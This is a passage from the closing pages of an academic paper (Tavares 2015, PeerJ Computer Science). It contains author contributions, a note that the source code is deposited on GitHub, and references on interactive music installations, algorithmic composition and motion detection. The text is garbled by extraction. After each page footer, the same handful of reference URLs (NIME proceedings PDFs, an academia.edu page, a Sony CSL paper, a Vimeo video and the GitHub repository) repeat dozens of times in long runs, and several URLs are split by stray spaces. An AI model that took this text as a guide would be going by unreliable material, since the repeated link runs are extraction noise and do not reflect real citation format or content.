tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Deposition The following information was supplied regarding the deposition of related data: The source code is available on GitHub (https://github.com/tiagoft/motus). REFERENCES Birchfield D, Phillips K, Kidané A, Lorig D. 2006. Interactive public sound art: a case study. In: Proceedings of the 2006 international conference on new interfaces for musical expression (NIME06). Available at http://www.nime.org/proceedings/2006/nime2006 043.pdf. Chen S, Maeda Y, Takahashi Y. 2014. Melody oriented interactive chaotic sound generation system using music conductor gesture. In: 2014 IEEE international conference on fuzzy systems (FUZZ-IEEE). Piscataway: IEEE, 1287–1290. Cope D. 1997. Techniques of the contemporary composer. New York: Schirmer Books. Dubberly H, Pangaro P, Haque U. 2009. On modeling: what is interaction? Are there different types? Interactions 16(1):69–75 DOI 10.1145/1456202.1456220. Garnett G. 2001. The aesthetics of interactive computer music. Computer Music Journal 25(1):21–33 DOI 10.1162/014892601300126089. Guisan AC. 2005. Interactive sound installation: intrium. In: Proceedings of the 2005 international conference on new interfaces for musical expression (NIME05). Available at http://www.nime.org/ proceedings/2005/nime2005 270.pdf. Jung D, Jensen MH, Laing S, Mayall J. 2012. Cycli: an interactive performance combining dance, graphics, music and kinect-technology. In: Proceedings of the 13th international conference of the NZ chapter of the ACM’s special interest group on human–computer interaction CHINZ ’12. New York: ACM, 36–43. Tavares (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.5 14/15 https://peerj.com/computer-science/ https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://www.nime.org/proceedings/2006/nime2006_043.pdf http://dx.doi.org/10.1145/1456202.1456220 http://dx.doi.org/10.1162/014892601300126089 http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://www.nime.org/proceedings/2005/nime2005_270.pdf http://dx.doi.org/10.7717/peerj-cs.5 Kallblad A, Friberg A, Svensson K, Edelholm ES. 2008. Hoppsa universum—an interactive dance installation for children. In: Proceedings of the 2008 international conference on new interfaces for musical expression (NIME08). Available at http://www.nime.org/proceedings/2008/nime2008 128. pdf. Kobori D, Kagawa K, Iida M, Arakaua C. 2006. Line: interactive sound and light installation. In: Proceedings of the 2006 international conference on new interfaces for musical expression (NIME06). Available at http://www.nime.org/proceedings/2006/nime2006 110.pdf. Moeslund TB. 2012. Introduction to video and image processing. Berlin: Springer. Morales-Manzanares R, Morales E, Dannenberg R, Berger J. 2001. Sicib: an interactive music composition system using body movements. Computer Music Journal 25(2):25–36 DOI 10.1162/014892601750302561. Morreale F, Masu R, Angeli AD. 2013. Robin: an algorithmic composer for interactive scenarios. In: Proceedings of the sound and music computing conference 2013, SMC 2013. Available at http:// www.academia.edu/4150285/Robin An algorithmic composer for interactive scenarios. Pachet F. 2002. The continuator: musical interaction with style. In: International computer music conference (ICMA). Available at https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f. pdf. Sanchez T, Castro G. 2014. Aether—interactive audiovisual installation. Available at vimeo.com/ 83469677 (acessed 19 July 2014). Schacher JC. 2009. Action and perception in interactive sound installations: an ecological approach. In: Proceedings of the 2009 international conference on new interfaces for musical expression (NIME09). Available at http://www.nime.org/proceedings/2009/nime2009 286.pdf. Schulze W, Van der Merwe B. 2011. Music generation with Markov models. MultiMedia, IEEE 18(3):78–85 DOI 10.1109/MMUL.2010.44. Seo J, Corness G. 2007. nite aura: an audiovisual interactive immersive installation. In: Proceedings of the 2007 international conference on new interfaces for musical expression (NIME07). Available at http://www.nime.org/proceedings/2007/nime2007 431.pdf. Szeliski R. 2010. Computer vision: algorithms and applications. Berlin: Springer. TheFunTheory. 2009. Piano stairs. Available at www.thefuntheory.com/piano-staircase (accessed 19 July 2014). Wirayuda T, Laksitowening K, Sthevanie F, Rismala R. 2013. Development methods for hybrid motion detection (frame difference-automatic threshold). In: 2013 international conference of information and communication technology (ICoICT). Piscataway: IEEE, 218–222. Tavares (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.5 15/15 https://peerj.com/computer-science/ http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2008/nime2008_128.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://www.nime.org/proceedings/2006/nime2006_110.pdf http://dx.doi.org/10.1162/014892601750302561 http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/4150285/Robin_An_algorithmic_composer_for_interactive_scenarios https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet-02f.pdf http://vimeo.com/83469677 http://vimeo.com/83469677 http://vimeo.com/83469677 http://vimeo.com/83469677 http://vimeo.com/83469677 http://vimeo.com/83469677 http://vimeo.com/83469677 http://vimeo.com/83469677 http://vimeo.com/83469677 http://vimeo.com/83469677 http://vimeo.com/83469677 http://vimeo.com/83469677 http://vimeo.com/83469677 http://vimeo.com/83469677 http://vimeo.com/83469677 http://vimeo.com/83469677 http://vimeo.com/83469677 http://vimeo.com/83469677 http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf 